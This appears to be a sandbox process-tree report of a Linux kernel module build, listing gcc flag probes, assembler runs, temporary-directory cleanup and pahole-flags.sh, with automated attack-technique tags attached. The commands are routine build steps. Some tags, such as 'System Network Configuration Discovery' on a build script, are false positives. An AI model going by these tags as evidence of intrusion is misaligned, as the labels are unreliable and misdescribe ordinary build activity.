/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY /dev/null -quiet -dumpdir /tmp/a/.tmp_1839/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds "-Wstringop-overflow=0" -Wrestrict "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fstack-protector-strong -o /tmp/cckZeuoX.s5⤵
- Writes file to tmp directory
PID:1842
-
-
/usr/local/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1839/tmp /tmp/cckZeuoX.s5⤵PID:1843
-
-
/usr/local/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1839/tmp /tmp/cckZeuoX.s5⤵PID:1843
-
-
/usr/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1839/tmp /tmp/cckZeuoX.s5⤵PID:1843
-
-
/usr/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1839/tmp /tmp/cckZeuoX.s5⤵PID:1843
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18394⤵PID:1844
-
-
-
/bin/sh/bin/sh -c "[ 1104000 -ge 0901000 ] && echo -Wno-alloc-size-larger-than || echo "3⤵PID:1845
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Werror=incompatible-pointer-types\"; else echo \"\"; fi"3⤵PID:1846
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18464⤵PID:1847
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack "-Werror=date-time" "-Werror=incompatible-pointer-types" -c -x c /dev/null -o /tmp/a/.tmp_1846/tmp4⤵PID:1848
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY /dev/null -quiet -dumpdir /tmp/a/.tmp_1846/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Walloc-size-larger-than=18446744073709551615EiB" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fno-strict-overflow "-fstack-check=no" -fconserve-stack -fstack-protector-strong -o /tmp/cc5rLk4e.s5⤵PID:1849
-
-
/usr/local/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1846/tmp /tmp/cc5rLk4e.s5⤵PID:1850
-
-
/usr/local/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1846/tmp /tmp/cc5rLk4e.s5⤵PID:1850
-
-
/usr/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1846/tmp /tmp/cc5rLk4e.s5⤵PID:1850
-
-
/usr/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1846/tmp /tmp/cc5rLk4e.s5⤵
- Writes file to tmp directory
PID:1850
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18464⤵PID:1851
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Werror=designated-init\"; else echo \"\"; fi"3⤵PID:1852
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18524⤵PID:1853
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -c -x c /dev/null -o /tmp/a/.tmp_1852/tmp4⤵
- Writes file to tmp directory
PID:1854 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY /dev/null -quiet -dumpdir /tmp/a/.tmp_1852/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Walloc-size-larger-than=18446744073709551615EiB" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fno-strict-overflow "-fstack-check=no" -fconserve-stack -fstack-protector-strong -o /tmp/cc3FYCAT.s5⤵
- Writes file to tmp directory
PID:1855
-
-
/usr/local/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1852/tmp /tmp/cc3FYCAT.s5⤵PID:1856
-
-
/usr/local/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1852/tmp /tmp/cc3FYCAT.s5⤵PID:1856
-
-
/usr/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1852/tmp /tmp/cc3FYCAT.s5⤵PID:1856
-
-
/usr/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1852/tmp /tmp/cc3FYCAT.s5⤵
- Writes file to tmp directory
PID:1856
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18524⤵PID:1857
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -fmacro-prefix-map=./= -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fmacro-prefix-map=./=\"; else echo \"\"; fi"3⤵PID:1858
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18584⤵PID:1859
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" "-fmacro-prefix-map=./=" -c -x c /dev/null -o /tmp/a/.tmp_1858/tmp4⤵PID:1860
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY /dev/null -quiet -dumpdir /tmp/a/.tmp_1858/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Walloc-size-larger-than=18446744073709551615EiB" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fno-strict-overflow "-fstack-check=no" -fconserve-stack "-fmacro-prefix-map=./=" -fstack-protector-strong -o /tmp/cchjlq1I.s5⤵PID:1861
-
-
/usr/local/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1858/tmp /tmp/cchjlq1I.s5⤵PID:1862
-
-
/usr/local/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1858/tmp /tmp/cchjlq1I.s5⤵PID:1862
-
-
/usr/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1858/tmp /tmp/cchjlq1I.s5⤵PID:1862
-
-
/usr/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1858/tmp /tmp/cchjlq1I.s5⤵
- Writes file to tmp directory
PID:1862
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18584⤵PID:1863
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -fmacro-prefix-map=./= -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -Wpacked-not-aligned -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-packed-not-aligned\"; else echo \"\"; fi"3⤵PID:1864
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18644⤵PID:1865
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ "-fmacro-prefix-map=./=" -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -Wpacked-not-aligned -c -x c /dev/null -o /tmp/a/.tmp_1864/tmp4⤵PID:1866
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY /dev/null -quiet -dumpdir /tmp/a/.tmp_1864/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Walloc-size-larger-than=18446744073709551615EiB" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -Wpacked-not-aligned "-std=gnu90" -p "-fmacro-prefix-map=./=" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fno-strict-overflow "-fstack-check=no" -fconserve-stack -fstack-protector-strong -o /tmp/ccZMRtkA.s5⤵PID:1867
-
-
/usr/local/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1864/tmp /tmp/ccZMRtkA.s5⤵PID:1868
-
-
/usr/local/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1864/tmp /tmp/ccZMRtkA.s5⤵PID:1868
-
-
/usr/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1864/tmp /tmp/ccZMRtkA.s5⤵PID:1868
-
-
/usr/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1864/tmp /tmp/ccZMRtkA.s5⤵
- Writes file to tmp directory
PID:1868
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18644⤵PID:1869
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( ld -m elf_x86_64 -z noexecstack --no-warn-rwx-segments -v) >/dev/null 2>&1; then echo \"--no-warn-rwx-segments\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1870 -
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18704⤵PID:1871
-
-
/usr/bin/ldld -m elf_x86_64 -z noexecstack --no-warn-rwx-segments -v4⤵PID:1872
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18704⤵PID:1873
-
-
-
/bin/sh/bin/sh -c "LC_ALL=C gcc --version 2>/dev/null | head -n 1"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1874 -
/usr/bin/headhead -n 14⤵PID:1876
-
-
/usr/bin/gccgcc --version4⤵PID:1875
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1877 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1878
-
-
-
/bin/sh/bin/sh -c "PAHOLE=pahole ./scripts/pahole-flags.sh"3⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1879 -
/usr/src/linux-headers-5.15.0-105-generic/scripts/pahole-flags.sh./scripts/pahole-flags.sh4⤵
- System Network Configuration Discovery
PID:1880
-
-
-
